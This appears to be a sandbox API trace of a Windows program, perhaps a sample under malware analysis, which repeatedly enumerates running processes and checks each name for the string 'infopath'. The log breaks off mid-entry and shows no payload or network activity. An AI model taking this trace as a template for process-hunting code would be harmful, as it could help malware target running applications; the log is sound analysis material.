[0096.704] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577b28 [0096.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577b28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.704] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.704] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0096.704] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.738] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577918 [0096.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577918, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.738] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.738] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0096.738] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.739] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577af8 [0096.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577af8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.740] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.740] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0096.740] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.741] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577b40 [0096.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577b40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.741] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.741] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0096.741] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.743] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577ab0 [0096.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577ab0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.743] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.743] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0096.743] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.744] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35778a0 [0096.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35778a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.744] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.744] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0096.744] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.746] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577930 [0096.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577930, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.746] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.746] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0096.746] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.747] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35778b8 [0096.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35778b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.747] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.747] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0096.747] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.749] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577ac8 [0096.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577ac8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.749] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.749] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0096.749] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.750] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577960 [0096.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577960, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.750] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.750] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0096.751] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0096.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.752] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577a08 [0096.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3577a08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0096.752] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0096.752] StrStrIA (lpFirst="spoolsv.exe", lpSrch="infopath") returned 0x0 [0096.752] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.753] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35778d0 [0096.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35778d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.754] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.754] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0096.754] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0096.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.755] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35778e8 [0096.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x35778e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0096.755] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0096.755] StrStrIA (lpFirst="audiodg.exe", lpSrch="infopath") returned 0x0 [0096.755] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0096.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.757] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3577900 [0096.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3577900, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0096.757] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0096.757] StrStrIA (lpFirst="sihost.exe", lpSrch="infopath") returned 0x0 [0096.757] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.758] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3577e10 [0096.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3577e10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.758] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.758] StrStrIA (lpFirst="svchost.exe", lpSrch="infopath") returned 0x0 [0096.758] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0096.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.759] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3577df8 [0096.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3577df8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0096.760] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0096.760] StrStrIA (lpFirst="taskhostw.exe", lpSrch="infopath") returned 0x0 [0096.760] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0096.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.761] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577e70 [0096.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3577e70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0096.762] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0096.762] StrStrIA (lpFirst="explorer.exe", lpSrch="infopath") returned 0x0 [0096.762] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0096.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.763] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575120 [0096.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3575120, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0096.763] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0096.763] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="infopath") returned 0x0 [0096.763] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0096.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0096.764] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b208 [0096.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356b208, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0096.765] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0096.765] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="infopath") returned 0x0 [0096.765] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0096.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.766] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575380 [0096.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3575380, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0096.766] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0096.766] StrStrIA (lpFirst="Memory Compression", lpSrch="infopath") returned 0x0 [0096.766] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0096.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0096.767] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x35753c0 [0096.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x35753c0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0096.767] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0096.767] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="infopath") returned 0x0 [0096.767] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0096.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.769] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3577e88 [0096.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3577e88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0096.769] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0096.769] StrStrIA (lpFirst="SearchUI.exe", lpSrch="infopath") returned 0x0 [0096.769] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0096.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.770] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35753e0 [0096.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x35753e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0096.770] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0096.771] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="infopath") returned 0x0 [0096.771] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.772] LocalAlloc 